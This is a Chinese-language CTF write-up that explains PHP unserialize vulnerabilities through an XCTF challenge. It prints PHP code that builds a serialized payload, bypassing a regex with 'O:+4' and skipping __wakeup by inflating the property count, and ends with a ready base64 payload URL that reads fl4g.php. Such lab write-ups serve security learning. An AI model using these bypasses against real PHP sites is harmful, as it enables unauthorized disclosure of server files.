------------------------------------------------------------------------------------------------------------------
昨天打了一场CTF,断更了一天。。。
------------------------------------------------------------------------------------------------------------------
?-----------------------------------------------------------------------------------------------------------------------------
之前的文章我们提到了4个函数,serialize,unserialize,__sleep(),__wakeup();
并了解了他们之间的关系。
但是PHP中除了__sleep(),__wakeup();还有很多魔法函数,这里不一一列出,在遇到不认识的魔法函数时,可以去单独学习一下。
反序化漏洞产生条件
1.unserialize的参数可控(可以传参)
2.存在魔法函数
题目示例
题目来源 XCTF
?题目给出需要利用反序化漏洞进入场景
?审计一下代码(注释是参考这里一位大哥的write up)
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file; //构造函数,对类的变量进行初始化
}
function __destruct() {
echo @highlight_file($this->file, true);
}
//魔术方法,如果有反序列化的使用,在反序列化之前会先调用这个方法
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
//正则匹配,如果在var变量中存在O/C:数字(O:数字或者C:数字这样的形式}),不区分大小写,就输出stop hacking!否则的话就进行发序列化
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
?>?这里利用到的魔法函数有__construct(),__destruct(),wakeup(),
- __construct(),创建时自动调用,用得到的参数覆盖$file
- __destruct(),销毁时调用,会显示文件的代码,这里要显示fl4g.php
- __wakeup(),反序列化时调用,会把$file重置成index.php
并且存在unserialize函数可以传参。
---------------------------------------------------------------------------------------------------------------------------------
满足漏洞产生条件
1.unserialize的参数可控(可以传参)
2.存在魔法函数
---------------------------------------------------------------------------------------------------------------------------------
?????????????????????????????
重点来了
我们对传入一个参数var后,函数的执行顺序进行梳理。
1.传参后isset判断是否为空,为空直接返回index.php
2.对参数var进行base64解码
3.preg_match进行正则匹配
4.正则匹配后:
1.__construct()函数初始化,把file=index.php初始化, 用得到的参数覆盖掉file值。
2.在调用unserialize反序列化var之前,自动调用__wakeup()函数
__wakeup()函数判定现在的file值(现在是我们传入的file值)是否为index.php,如果不是
就修改file值为index.php
5.调用unserialize函数反序化var值.
6.调用完unserialize函数后,__destruct()函数将输出当前file值的源码。
?????????????????????????????
抓住反序化漏洞的关键
上面步骤4.2是反序化漏洞的关键,反序化问题其实并不是出在serialize,unserizlize函数上,
而是这些随着serialize,unserizlize使用而自动调用的魔法函数存在隐患--------(一旦某些函数存在绕过,程序可能就不会按照正常顺序执行,从而导致意想之外的结果)
序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
解题步骤
1.构造Demo对象传入file值fl4g.php
2.求出对创建的Demo对象序列化:结果为:O:4:"Demo":1:{s:10:" Demofile ";s:8:"fl4g.php";}
3.在对象名长度值‘4’,添加+,结果为:
O:+4:"Demo":1 {s:10:" Demofile ";s:8:"fl4g.php";}??????? //绕过正则
4.修改对象属性个数 ‘1’ 这里可以任意换成一个数字,我改个3 结果为:
O:+4:"Demo":3 {s:10:" Demofile ";s:8:"fl4g.php";}?????? //绕过wakeup函数
5.base64编码
下面给出运行代码
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$s=new Demo('fl4g.php');
$s=serialize($s);
echo $s;
$s = str_replace('O:4', 'O:+4',$s); // 绕过正则
$s = str_replace(':1:', ':2:' ,$s);// 绕过wakeup
echo base64_encode($s);
?>结果
O:4:"Demo":1{s:10:"Demofile";s:8:"fl4g.php";}
TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
所以得到payload
http://111.200.241.244:54808/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==可以换成自己题目的url直接去用。
——————————————————————————————————————————
对于这道题目补充2个细节
1.要想绕过正则匹配,就要满足的条件:看的懂正则
分析正则:if (preg_match('/[oc]:\d+:/i', $var)
[oc] 匹配o或者c
\d 匹配任意一个10进制的数
+ 匹配前面的字符 1-N 次
i 表示不区分大小写
在前面添加一个加号可以绕过。
2.这里的 file 变量为私有变量,所以序列化之后的字符串开头结 尾各有一个空白字符(即%00),字符串长度也比实际长度大 2,如果将序列化结 果复制到在线的 base64 网站进行编码可能就会丢掉空白字符。所以可以直接使用我的payload,或者自己在php环境中运行代码得到,推荐一个在线php运行网站。
PHP 在线工具 | 菜鸟工具
https://c.runoob.com/compile/1/---------------------------------------------------------------------------------------------------------------------------------
这一节介绍了如何寻找和利用反序化漏洞点,下一节介绍php反序化链构造。
估计是日更不了了。
